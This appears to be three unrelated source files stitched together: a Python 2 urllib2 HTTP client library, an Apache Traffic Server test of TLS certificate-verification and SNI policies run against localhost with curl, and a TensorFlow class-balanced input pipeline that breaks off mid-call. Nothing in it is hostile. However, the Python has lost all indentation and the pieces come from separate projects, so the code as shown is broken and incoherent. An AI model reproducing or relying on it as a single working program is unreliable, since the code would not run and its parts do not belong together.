"""Call `request` with :mod:`urllib2` and process results.
:param request: :class:`urllib2.Request` instance
"""
self.request = request
self.url = None
self.raw = None
self._encoding = None
self.error = None
self.status_code = None
self.reason = None
self.headers = CaseInsensitiveDictionary()
self._content = None
self._gzipped = False
# Execute query
try:
self.raw = urllib2.urlopen(request)
except urllib2.HTTPError as err:
self.error = err
try:
self.url = err.geturl()
# sometimes (e.g. when authentication fails)
# urllib can't get a URL from an HTTPError
# This behaviour changes across Python versions,
# so no test cover (it isn't important).
except AttributeError: # pragma: no cover
pass
self.status_code = err.code
else:
self.status_code = self.raw.getcode()
self.url = self.raw.geturl()
self.reason = RESPONSES.get(self.status_code)
# Parse additional info if request succeeded
if not self.error:
headers = self.raw.info()
self.transfer_encoding = headers.getencoding()
self.mimetype = headers.gettype()
for key in headers.keys():
self.headers[key.lower()] = headers.get(key)
# Is content gzipped?
# Transfer-Encoding appears to not be used in the wild
# (contrary to the HTTP standard), but no harm in testing
# for it
if ('gzip' in headers.get('content-encoding', '') or
'gzip' in headers.get('transfer-encoding', '')):
self._gzipped = True
def json(self):
"""Decode response contents as JSON.
:returns: object decoded from JSON
:rtype: :class:`list` / :class:`dict`
"""
return json.loads(self.content, self.encoding or 'utf-8')
@property
def encoding(self):
"""Text encoding of document or ``None``
:returns: :class:`str` or ``None``
"""
if not self._encoding:
self._encoding = self._get_encoding()
return self._encoding
@property
def content(self):
"""Raw content of response (i.e. bytes)
:returns: Body of HTTP response
:rtype: :class:`str`
"""
if not self._content:
# Decompress gzipped content
if self._gzipped:
decoder = zlib.decompressobj(16 + zlib.MAX_WBITS)
self._content = decoder.decompress(self.raw.read())
else:
self._content = self.raw.read()
return self._content
@property
def text(self):
"""Unicode-decoded content of response body.
If no encoding can be determined from HTTP headers or the content
itself, the encoded response body will be returned instead.
:returns: Body of HTTP response
:rtype: :class:`unicode` or :class:`str`
"""
if self.encoding:
return unicodedata.normalize('NFC', unicode(self.content,
self.encoding))
return self.content
def iter_content(self, chunk_size=4096, decode_unicode=False):
"""Iterate over response data.
.. versionadded:: 1.6
:param chunk_size: Number of bytes to read into memory
:type chunk_size: ``int``
:param decode_unicode: Decode to Unicode using detected encoding
:type decode_unicode: ``Boolean``
:returns: iterator
"""
def decode_stream(iterator, r):
decoder = codecs.getincrementaldecoder(r.encoding)(errors='replace')
for chunk in iterator:
data = decoder.decode(chunk)
if data:
yield data
data = decoder.decode(b'', final=True)
if data:
yield data # pragma: nocover
def generate():
if self._gzipped:
decoder = zlib.decompressobj(16 + zlib.MAX_WBITS)
while True:
chunk = self.raw.read(chunk_size)
if not chunk:
break
if self._gzipped:
chunk = decoder.decompress(chunk)
yield chunk
chunks = generate()
if decode_unicode and self.encoding:
chunks = decode_stream(chunks, self)
return chunks
def save_to_path(self, filepath):
"""Save retrieved data to file at ``filepath``
.. versionadded:: 1.9.6
:param filepath: Path to save retrieved data.
"""
filepath = os.path.abspath(filepath)
dirname = os.path.dirname(filepath)
if not os.path.exists(dirname):
os.makedirs(dirname)
with open(filepath, 'wb') as fileobj:
for data in self.iter_content():
fileobj.write(data)
def raise_for_status(self):
"""Raise stored error if one occurred.
error will be instance of :class:`urllib2.HTTPError`
"""
if self.error is not None:
raise self.error
return
def _get_encoding(self):
"""Get encoding from HTTP headers or content.
:returns: encoding or `None`
:rtype: ``unicode`` or ``None``
"""
headers = self.raw.info()
encoding = None
if headers.getparam('charset'):
encoding = headers.getparam('charset')
# HTTP Content-Type header
for param in headers.getplist():
if param.startswith('charset='):
encoding = param[8:]
break
# Encoding declared in document should override HTTP headers
if self.mimetype == 'text/html': # sniff HTML headers
m = re.search("""<meta.+charset=["']{0,1}(.+?)["'].*>""",
self.content)
if m:
encoding = m.group(1)
elif ((self.mimetype.startswith('application/') or
self.mimetype.startswith('text/')) and
'xml' in self.mimetype):
m = re.search("""<\?xml.+encoding=["'](.+?)["'][^>]*\?>""",
self.content)
if m:
encoding = m.group(1)
# Format defaults
if self.mimetype == 'application/json' and not encoding:
# The default encoding for JSON
encoding = 'utf-8'
elif self.mimetype == 'application/xml' and not encoding:
# The default for 'application/xml'
encoding = 'utf-8'
if encoding:
encoding = encoding.lower()
return encoding
def request(method, url, params=None, data=None, headers=None, cookies=None,
files=None, auth=None, timeout=60, allow_redirects=False):
"""Initiate an HTTP(S) request. Returns :class:`Response` object.
:param method: 'GET' or 'POST'
:type method: ``unicode``
:param url: URL to open
:type url: ``unicode``
:param params: mapping of URL parameters
:type params: :class:`dict`
:param data: mapping of form data ``{'field_name': 'value'}`` or
:class:`str`
:type data: :class:`dict` or :class:`str`
:param headers: HTTP headers
:type headers: :class:`dict`
:param cookies: cookies to send to server
:type cookies: :class:`dict`
:param files: files to upload (see below).
:type files: :class:`dict`
:param auth: username, password
:type auth: ``tuple``
:param timeout: connection timeout limit in seconds
:type timeout: ``int``
:param allow_redirects: follow redirections
:type allow_redirects: ``Boolean``
:returns: :class:`Response` object
The ``files`` argument is a dictionary::
{'fieldname' : { 'filename': 'blah.txt',
'content': '<binary data>',
'mimetype': 'text/plain'}
}
* ``fieldname`` is the name of the field in the HTML form.
* ``mimetype`` is optional. If not provided, :mod:`mimetypes` will
be used to guess the mimetype, or ``application/octet-stream``
will be used.
"""
# TODO: cookies
# TODO: any way to force GET or POST?
socket.setdefaulttimeout(timeout)
# Default handlers
openers = []
if not allow_redirects:
openers.append(NoRedirectHandler())
if auth is not None: # Add authorisation handler
username, password = auth
password_manager = urllib2.HTTPPasswordMgrWithDefaultRealm()
password_manager.add_password(None, url, username, password)
auth_manager = urllib2.HTTPBasicAuthHandler(password_manager)
openers.append(auth_manager)
# Install our custom chain of openers
opener = urllib2.build_opener(*openers)
urllib2.install_opener(opener)
if not headers:
headers = CaseInsensitiveDictionary()
else:
headers = CaseInsensitiveDictionary(headers)
if 'user-agent' not in headers:
headers['user-agent'] = USER_AGENT
# Accept gzip-encoded content
encodings = [s.strip() for s in
headers.get('accept-encoding', '').split(',')]
if 'gzip' not in encodings:
encodings.append('gzip')
headers['accept-encoding'] = ', '.join(encodings)
if files:
if not data:
data = {}
new_headers, data = encode_multipart_formdata(data, files)
headers.update(new_headers)
elif data and isinstance(data, dict):
data = urllib.urlencode(str_dict(data))
# Make sure everything is encoded text
headers = str_dict(headers)
if isinstance(url, unicode):
url = url.encode('utf-8')
if params: # GET args (POST args are handled in encode_multipart_formdata)
scheme, netloc, path, query, fragment = urlparse.urlsplit(url)
if query: # Combine query string and `params`
url_params = urlparse.parse_qs(query)
# `params` take precedence over URL query string
url_params.update(params)
params = url_params
query = urllib.urlencode(str_dict(params), doseq=True)
url = urlparse.urlunsplit((scheme, netloc, path, query, fragment))
req = urllib2.Request(url, data, headers)
return Response(req)
def get(url, params=None, headers=None, cookies=None, auth=None,
timeout=60, allow_redirects=True):
"""Initiate a GET request. Arguments as for :func:`request`.
:returns: :class:`Response` instance
"""
return request('GET', url, params, headers=headers, cookies=cookies,
auth=auth, timeout=timeout, allow_redirects=allow_redirects)
def post(url, params=None, data=None, headers=None, cookies=None, files=None,
auth=None, timeout=60, allow_redirects=False):
"""Initiate a POST request. Arguments as for :func:`request`.
:returns: :class:`Response` instance
"""
return request('POST', url, params, data, headers, cookies, files, auth,
timeout, allow_redirects)
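# A minimal usage sketch (the URL and field names are hypothetical):
#
#   r = get('https://example.com/api', params={'q': 'alfred'})
#   r.raise_for_status()
#   data = r.json()
#
#   r = post('https://example.com/upload',
#            files={'file': {'filename': 'blah.txt',
#                            'content': open('blah.txt', 'rb').read()}})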
def encode_multipart_formdata(fields, files):
"""Encode form data (``fields``) and ``files`` for POST request.
:param fields: mapping of ``{name : value}`` pairs for normal form fields.
:type fields: :class:`dict`
:param files: dictionary of fieldnames/files elements for file data.
See below for details.
:type files: :class:`dict` of :class:`dicts`
:returns: ``(headers, body)``, where ``headers`` is a :class:`dict` of HTTP
headers and ``body`` is the encoded request body
:rtype: 2-tuple ``(dict, str)``
The ``files`` argument is a dictionary::
{'fieldname' : { 'filename': 'blah.txt',
'content': '<binary data>',
'mimetype': 'text/plain'}
}
- ``fieldname`` is the name of the field in the HTML form.
- ``mimetype`` is optional. If not provided, :mod:`mimetypes` will be used to guess the mimetype, or ``application/octet-stream`` will be used.
"""
def get_content_type(filename):
"""Return or guess mimetype of ``filename``.
:param filename: filename of file
:type filename: unicode/string
:returns: mime-type, e.g. ``text/html``
:rtype: :class:`str`
"""
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
boundary = '-----' + ''.join(random.choice(BOUNDARY_CHARS)
for i in range(30))
CRLF = '\r\n'
output = []
# Normal form fields
for (name, value) in fields.items():
if isinstance(name, unicode):
name = name.encode('utf-8')
if isinstance(value, unicode):
value = value.encode('utf-8')
output.append('--' + boundary)
output.append('Content-Disposition: form-data; name="%s"' % name)
output.append('')
output.append(value)
# Files to upload
for name, d in files.items():
filename = d[u'filename']
content = d[u'content']
if u'mimetype' in d:
mimetype = d[u'mimetype']
else:
mimetype = get_content_type(filename)
if isinstance(name, unicode):
name = name.encode('utf-8')
if isinstance(filename, unicode):
filename = filename.encode('utf-8')
if isinstance(mimetype, unicode):
mimetype = mimetype.encode('utf-8')
output.append('--' + boundary)
output.append('Content-Disposition: form-data; '
'name="%s"; filename="%s"' % (name, filename))
output.append('Content-Type: %s' % mimetype)
output.append('')
output.append(content)
output.append('--' + boundary + '--')
output.append('')
body = CRLF.join(output)
headers = {
'Content-Type': 'multipart/form-data; boundary=%s' % boundary,
'Content-Length': str(len(body)),
}
return (headers, body)
|
|
'''
'''
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
Test.Summary = '''
Test TLS server certificate verification options. Exercise conf_remap overrides.
'''
# Define default ATS
ts = Test.MakeATSProcess("ts", select_ports=True, enable_tls=True)
server_foo = Test.MakeOriginServer("server_foo",
ssl=True,
options={"--key": "{0}/signed-foo.key".format(Test.RunDirectory),
"--cert": "{0}/signed-foo.pem".format(Test.RunDirectory)})
server_bar = Test.MakeOriginServer("server_bar",
ssl=True,
options={"--key": "{0}/signed-bar.key".format(Test.RunDirectory),
"--cert": "{0}/signed-bar.pem".format(Test.RunDirectory)})
server = Test.MakeOriginServer("server", ssl=True)
dns = Test.MakeDNServer("dns")
request_foo_header = {"headers": "GET / HTTP/1.1\r\nHost: foo.com\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
request_bad_foo_header = {"headers": "GET / HTTP/1.1\r\nHost: bad_foo.com\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
request_bar_header = {"headers": "GET / HTTP/1.1\r\nHost: bar.com\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
request_bad_bar_header = {"headers": "GET / HTTP/1.1\r\nHost: bad_bar.com\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
response_header = {"headers": "HTTP/1.1 200 OK\r\nConnection: close\r\n\r\n", "timestamp": "1469733493.993", "body": ""}
server_foo.addResponse("sessionlog.json", request_foo_header, response_header)
server_foo.addResponse("sessionlog.json", request_bad_foo_header, response_header)
server_bar.addResponse("sessionlog.json", request_bar_header, response_header)
server_bar.addResponse("sessionlog.json", request_bad_bar_header, response_header)
# add ssl materials like key, certificates for the server
ts.addSSLfile("ssl/signed-foo.pem")
ts.addSSLfile("ssl/signed-foo.key")
ts.addSSLfile("ssl/signed-bar.pem")
ts.addSSLfile("ssl/signed-bar.key")
ts.addSSLfile("ssl/server.pem")
ts.addSSLfile("ssl/server.key")
ts.addSSLfile("ssl/signer.pem")
ts.addSSLfile("ssl/signer.key")
ts.Disk.remap_config.AddLine(
'map http://foo.com/basic https://foo.com:{0}'.format(server_foo.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map http://foo.com/override https://foo.com:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=ENFORCED'.format(
server_foo.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map http://bar.com/basic https://bar.com:{0}'.format(server_foo.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map http://bar.com/overridedisabled https://bar.com:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=DISABLED'.format(
server_foo.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map http://bar.com/overridesignature https://bar.com:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.properties=SIGNATURE @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=ENFORCED'.format(
server_foo.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map http://bar.com/overrideenforced https://bar.com:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=ENFORCED'.format(
server_foo.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map /basic https://127.0.0.1:{0}'.format(server.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map /overrideenforce https://127.0.0.1:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=ENFORCED'.format(
server.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map /overridename https://127.0.0.1:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.properties=NAME'.format(
server.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map /snipolicyfooremap https://foo.com:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.properties=NAME @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=ENFORCED @plugin=conf_remap.so @pparam=proxy.config.ssl.client.sni_policy=remap'.format(
server_bar.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map /snipolicyfoohost https://foo.com:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.properties=NAME @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=ENFORCED @plugin=conf_remap.so @pparam=proxy.config.ssl.client.sni_policy=host'.format(
server_bar.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map /snipolicyfooservername https://foo.com:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.properties=NAME @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=ENFORCED @plugin=conf_remap.so @pparam=proxy.config.ssl.client.sni_policy=server_name'.format(
server_bar.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map /snipolicybarremap https://bar.com:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.properties=NAME @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=ENFORCED @plugin=conf_remap.so @pparam=proxy.config.ssl.client.sni_policy=remap'.format(
server_bar.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map /snipolicybarhost https://bar.com:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.properties=NAME @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=ENFORCED @plugin=conf_remap.so @pparam=proxy.config.ssl.client.sni_policy=host'.format(
server_bar.Variables.SSL_Port))
ts.Disk.remap_config.AddLine(
'map /snipolicybarservername https://bar.com:{0} @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.properties=NAME @plugin=conf_remap.so @pparam=proxy.config.ssl.client.verify.server.policy=ENFORCED @plugin=conf_remap.so @pparam=proxy.config.ssl.client.sni_policy=server_name'.format(
server_bar.Variables.SSL_Port))
ts.Disk.ssl_multicert_config.AddLine(
'dest_ip=* ssl_cert_name=server.pem ssl_key_name=server.key'
)
# Case 1, global config policy=permissive properties=signature
# override for foo.com policy=enforced properties=all
ts.Disk.records_config.update({
'proxy.config.diags.debug.enabled': 1,
'proxy.config.diags.debug.tags': 'ssl',
'proxy.config.ssl.server.cert.path': '{0}'.format(ts.Variables.SSLDir),
'proxy.config.ssl.server.private_key.path': '{0}'.format(ts.Variables.SSLDir),
'proxy.config.ssl.client.CA.cert.path': '{0}'.format(ts.Variables.SSLDir),
'proxy.config.ssl.client.CA.cert.filename': 'signer.pem',
'proxy.config.url_remap.pristine_host_hdr': 1,
'proxy.config.exec_thread.autoconfig.scale': 1.0,
'proxy.config.dns.nameservers': '127.0.0.1:{0}'.format(dns.Variables.Port),
'proxy.config.dns.resolv_conf': 'NULL',
'proxy.config.ssl.client.verify.server.policy': 'PERMISSIVE'
})
dns.addRecords(records={"foo.com.": ["127.0.0.1"]})
dns.addRecords(records={"bar.com.": ["127.0.0.1"]})
# Should succeed without message
tr = Test.AddTestRun("default-permissive-success")
tr.Setup.Copy("ssl/signed-foo.key")
tr.Setup.Copy("ssl/signed-foo.pem")
tr.Setup.Copy("ssl/signed-bar.key")
tr.Setup.Copy("ssl/signed-bar.pem")
tr.Processes.Default.Command = 'curl -k -H \"host: foo.com\" http://127.0.0.1:{0}/basic'.format(ts.Variables.port)
tr.ReturnCode = 0
tr.Processes.Default.StartBefore(dns)
tr.Processes.Default.StartBefore(server_foo)
tr.Processes.Default.StartBefore(server_bar)
tr.Processes.Default.StartBefore(server)
tr.Processes.Default.StartBefore(Test.Processes.ts)
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
# Should succeed. No message
tr.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could Not Connect", "Curl attempt should have succeeded")
tr2 = Test.AddTestRun("default-permissive-fail")
tr2.Processes.Default.Command = "curl -k -H \"host: bar.com\" http://127.0.0.1:{0}/basic".format(ts.Variables.port)
tr2.ReturnCode = 0
tr2.StillRunningAfter = server
tr2.StillRunningAfter = ts
# Should succeed, but there will be a message in the log about the name mismatch
tr2.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could Not Connect", "Curl attempt should have succeeded")
tr2 = Test.AddTestRun("default-permissive-fail2")
tr2.Processes.Default.Command = "curl -k -H \"host: random.com\" http://127.0.0.1:{0}/basic".format(ts.Variables.port)
tr2.ReturnCode = 0
tr2.StillRunningAfter = server
tr2.StillRunningAfter = ts
# Should succeed, but there will be a message in the log about the signature
tr2.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could Not Connect", "Curl attempt should have succeeded")
tr3 = Test.AddTestRun("override-foo")
tr3.Processes.Default.Command = "curl -k -H \"host: foo.com\" http://127.0.0.1:{0}/override".format(ts.Variables.port)
tr3.ReturnCode = 0
tr3.StillRunningAfter = server
tr3.StillRunningAfter = ts
# Should succeed. No error messages
tr3.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could Not Connect", "Curl attempt should have succeeded")
tr4 = Test.AddTestRun("override-bar-disabled")
tr4.Processes.Default.Command = "curl -k -H \"host: bad_bar.com\" http://127.0.0.1:{0}/overridedisabled".format(ts.Variables.port)
tr4.ReturnCode = 0
tr4.StillRunningAfter = server
tr4.StillRunningAfter = ts
# Succeed. No error messages
tr4.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could Not Connect", "Curl attempt should have succeeded")
tr5 = Test.AddTestRun("override-bar-signature-enforced")
tr5.Processes.Default.Command = "curl -k -H \"host: bar.com\" http://127.0.0.1:{0}/overridesignature".format(ts.Variables.port)
tr5.ReturnCode = 0
tr5.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could Not Connect", "Curl attempt should have succeeded")
tr5.StillRunningAfter = server
tr5.StillRunningAfter = ts
tr6 = Test.AddTestRun("override-bar-enforced")
tr6.Processes.Default.Command = "curl -k -H \"host: bar.com\" http://127.0.0.1:{0}/overrideenforced".format(ts.Variables.port)
tr6.ReturnCode = 0
# Should fail
tr6.Processes.Default.Streams.stdout = Testers.ContainsExpression("Could Not Connect", "Curl attempt should have failed")
tr6.StillRunningAfter = server
tr6.StillRunningAfter = ts
# Should succeed
tr = Test.AddTestRun("foo-to-bar-sni-policy-remap")
tr.Processes.Default.Command = "curl -k -H \"host: foo.com\" http://127.0.0.1:{0}/snipolicybarremap".format(ts.Variables.port)
tr.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
tr.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could not connect", "Curl attempt should succeed")
# Should fail
tr = Test.AddTestRun("foo-to-bar-sni-policy-host")
tr.Processes.Default.Command = "curl -k -H \"host: foo.com\" http://127.0.0.1:{0}/snipolicybarhost".format(ts.Variables.port)
tr.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
tr.Processes.Default.Streams.stdout = Testers.ContainsExpression("Could not connect", "Curl attempt should fail")
# Should fail
tr = Test.AddTestRun("foo-to-bar-sni-policy-servername")
tr.Processes.Default.Command = "curl -k --resolv foo.com:{0}:127.0.0.1 https://foo.com:{0}/snipolicybarservername".format(
ts.Variables.ssl_port)
tr.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
tr.Processes.Default.Streams.stdout = Testers.ContainsExpression("Could not connect", "Curl attempt should fail")
# Should fail
tr = Test.AddTestRun("bar-to-foo-sni-policy-remap")
tr.Processes.Default.Command = "curl -k -H \"host: bar.com\" http://127.0.0.1:{0}/snipolicyfooremap".format(ts.Variables.port)
tr.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
tr.Processes.Default.Streams.stdout = Testers.ContainsExpression("Could not connect", "Curl attempt should fail")
# Should succeed
tr = Test.AddTestRun("bar-to-foo-sni-policy-host")
tr.Processes.Default.Command = "curl -k -H \"host: bar.com\" http://127.0.0.1:{0}/snipolicyfoohost".format(ts.Variables.port)
tr.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
tr.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could not connect", "Curl attempt should succeed")
# Should succeed
tr = Test.AddTestRun("bar-to-foo-sni-policy-servername")
tr.Processes.Default.Command = "curl -k --resolv bar.com:{0}:127.0.0.1 https://bar.com:{0}/snipolicyfooservername".format(
ts.Variables.ssl_port)
tr.ReturnCode = 0
tr.StillRunningAfter = server
tr.StillRunningAfter = ts
tr.Processes.Default.Streams.stdout = Testers.ExcludesExpression("Could not connect", "Curl attempt should succeed")
# Overriding the built-in ERROR check since we expect some cases to fail
# Checks on random.com should fail with a warning message only
ts.Disk.diags_log.Content = Testers.ContainsExpression(
r"WARNING: Core server certificate verification failed for \(random.com\). Action=Continue Error=self signed certificate server=127.0.0.1\(127.0.0.1\) depth=0",
"Warning for self signed certificate")
# permissive failure for bar.com
ts.Disk.diags_log.Content += Testers.ContainsExpression(
r"WARNING: SNI \(bar.com\) not in certificate. Action=Continue server=bar.com\(127.0.0.1\)",
"Warning on missing name for bar.com")
# name check failure for random.com
ts.Disk.diags_log.Content += Testers.ContainsExpression(
r"WARNING: SNI \(random.com\) not in certificate. Action=Continue server=127.0.0.1\(127.0.0.1\)",
"Warning on missing name for random.com")
# name check failure for bar.com
ts.Disk.diags_log.Content += Testers.ContainsExpression(
r"WARNING: SNI \(bar.com\) not in certificate. Action=Terminate server=bar.com\(127.0.0.1\)",
"Failure on missing name for bar.com")
|
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Input pipeline.
Read and process each example.
"""
import functools
from typing import Dict
from class_balanced_distillation import deterministic_data
import ml_collections
import numpy as np
import simclr.tf2.data_util as simclr_data
import tensorflow as tf
import tensorflow_datasets as tfds
def random_color_jitter(image, p=1.0):
def _transform(image):
color_jitter_t = functools.partial(
simclr_data.color_jitter, strength=1.0, impl="simclrv2")
image = simclr_data.random_apply(color_jitter_t, p=0.8, x=image)
return simclr_data.random_apply(simclr_data.to_grayscale, p=0.2, x=image)
return simclr_data.random_apply(_transform, p=p, x=image)
def oversample_classes(example, base_probs, target_probs):
"""Returns the number of copies of given example."""
cur_label = example["label"]
cur_prob = base_probs[cur_label]
cur_target_prob = target_probs[cur_label]
# Add tiny to base_probs to avoid division by zero.
denom = (cur_prob + np.finfo(cur_prob.dtype.as_numpy_dtype).tiny)
ratio_l = tf.cast(cur_target_prob / denom, tf.float32)
# Return 1 for head classes, we only want to sample them once
max_ratio = tf.maximum(ratio_l, 1)
# This is the number of duplicates we want to add for oversampling
num_oversamples = tf.floor(ratio_l)
# Maybe add one more based on the residual probability
residual = max_ratio - num_oversamples
residual_sel = tf.less_equal(
tf.random.uniform([], dtype=tf.float32), residual
)
return tf.cast(num_oversamples, tf.int64) + tf.cast(residual_sel, tf.int64)
def undersampling_filter(example, base_probs, target_probs):
"""Computes if given example is rejected or not."""
cur_label = example["label"]
cur_prob = base_probs[cur_label]
cur_target_prob = target_probs[cur_label]
# Add tiny to base_probs to avoid division by zero.
denom = (cur_prob + np.finfo(cur_prob.dtype.as_numpy_dtype).tiny)
ratio_l = tf.cast(cur_target_prob / denom, tf.float32)
acceptance_prob = tf.minimum(ratio_l, 1.0)
acceptance = tf.less_equal(tf.random.uniform([], dtype=tf.float32),
acceptance_prob)
return acceptance
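def _resampled_dataset_sketch(ds, base_probs, target_probs):
  """A hypothetical sketch (not used by the pipeline below) showing how the
  two helpers above plug into tf.data: oversample_classes() yields a
  per-example repeat count, undersampling_filter() a stochastic
  accept/reject predicate."""
  ds = ds.flat_map(
      lambda ex: tf.data.Dataset.from_tensors(ex).repeat(
          oversample_classes(ex, base_probs, target_probs)))
  return ds.filter(
      lambda ex: undersampling_filter(ex, base_probs, target_probs))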
def resize_small(image,
size,
*,
antialias = False):
"""Resizes the smaller side to `size` keeping aspect ratio.
Args:
image: Single image as a float32 tensor.
size: An integer giving the new size of the smaller side of the input
image.
antialias: Whether to use an anti-aliasing filter when downsampling an
image.
Returns:
The resized image, with its aspect ratio preserved.
"""
h, w = tf.shape(image)[0], tf.shape(image)[1]
# Figure out the necessary h/w.
ratio = (tf.cast(size, tf.float32) / tf.cast(tf.minimum(h, w), tf.float32))
h = tf.cast(tf.round(tf.cast(h, tf.float32) * ratio), tf.int32)
w = tf.cast(tf.round(tf.cast(w, tf.float32) * ratio), tf.int32)
image = tf.image.resize(image, [h, w], antialias=antialias)
return image
def central_crop(image, size):
"""Makes central crop of a given size."""
h, w = size, size
top = (tf.shape(image)[0] - h) // 2
left = (tf.shape(image)[1] - w) // 2
image = tf.image.crop_to_bounding_box(image, top, left, h, w)
return image
def decode_and_random_resized_crop(image, rng,
resize_size,
do_normalize = True):
"""Decodes the images and extracts a random crop."""
shape = tf.io.extract_jpeg_shape(image)
begin, size, _ = tf.image.stateless_sample_distorted_bounding_box(
shape,
tf.zeros([0, 0, 4], tf.float32),
seed=rng,
area_range=(0.05, 1.0),
min_object_covered=0, # Don't enforce a minimum area.
use_image_if_no_bounding_boxes=True)
top, left, _ = tf.unstack(begin)
h, w, _ = tf.unstack(size)
image = tf.image.decode_and_crop_jpeg(image, [top, left, h, w], channels=3)
if do_normalize:
image = tf.cast(image, tf.float32) / 255.0
image = tf.image.resize(image, (resize_size, resize_size))
return image
def train_preprocess(features,
add_jitter = False):
"""Processes a single example for training."""
image = features["image"]
label = features["label"]
# This PRNGKey is unique to this example. We can use it with the stateless
# random ops in TF.
rng = features.pop("rng")
rng, rng_crop, rng_flip = tf.unstack(
tf.random.experimental.stateless_split(rng, 3))
image = decode_and_random_resized_crop(image, rng_crop, resize_size=224)
image = tf.image.stateless_random_flip_left_right(image, rng_flip)
if add_jitter:
image = random_color_jitter(image)
image = tf.clip_by_value(image, 0., 1.)
features = {"image": image, "label": label}
return features
def eval_preprocess(features):
"""Process a single example for evaluation."""
image = features["image"]
assert image.dtype == tf.uint8
image = tf.cast(image, tf.float32) / 255.0
image = resize_small(image, size=256)
image = central_crop(image, size=224)
return {"image": image, "label": features["label"]}
def create_datasets(
config, data_rng, *,
strategy):
"""Create datasets for training and evaluation.
For the same data_rng and config this will return the same datasets. The
datasets only contain stateless operations.
Args:
config: Configuration to use.
data_rng: PRNGKey for seeding operations in the training dataset.
strategy: Distribution strategy to use. Each replica will run a separate
input pipeline.
Returns:
A tuple with the dataset info, the training dataset and the evaluation
dataset.
"""
if config.dataset == "imagenet-lt":
dataset_builder = (
tfds.builder("imagenet_lt",
data_dir="~/data/imagenet-lt/tfds/"))
elif config.dataset == "inaturalist18":
dataset_builder = (
tfds.builder("i_naturalist2018",
data_dir="~/data/inaturalist18/tfds/"))
else:
raise ValueError(f"Dataset {config.dataset} not supported.")
def train_split(host_id, host_count):
return deterministic_data.get_read_instruction_for_host(
"train",
dataset_builder.info.splits["train"].num_examples,
host_id=host_id,
host_count=host_count)
def val_split(host_id, host_count):
return deterministic_data.get_read_instruction_for_host(
"validation",
dataset_builder.info.splits["validation"].num_examples,
host_id=host_id,
host_count=host_count,
drop_remainder=False
)
def test_split(host_id, host_count):
return deterministic_data.get_read_instruction_for_host(
"test",
dataset_builder.info.splits["test"].num_examples,
host_id=host_id,
host_count=host_count,
drop_remainder=False
)
if config.sampling == "class_balanced" or config.sampling == "sqrt":
if config.dataset == "imagenet-lt":
img_per_class = np.load(
tf.io.gfile.GFile(
"class_balanced_distillation/data/ImageNet_LT/train_img_per_class.npy",
"rb"))
elif config.dataset == "inaturalist18":
img_per_class = np.load(
tf.io.gfile.GFile(
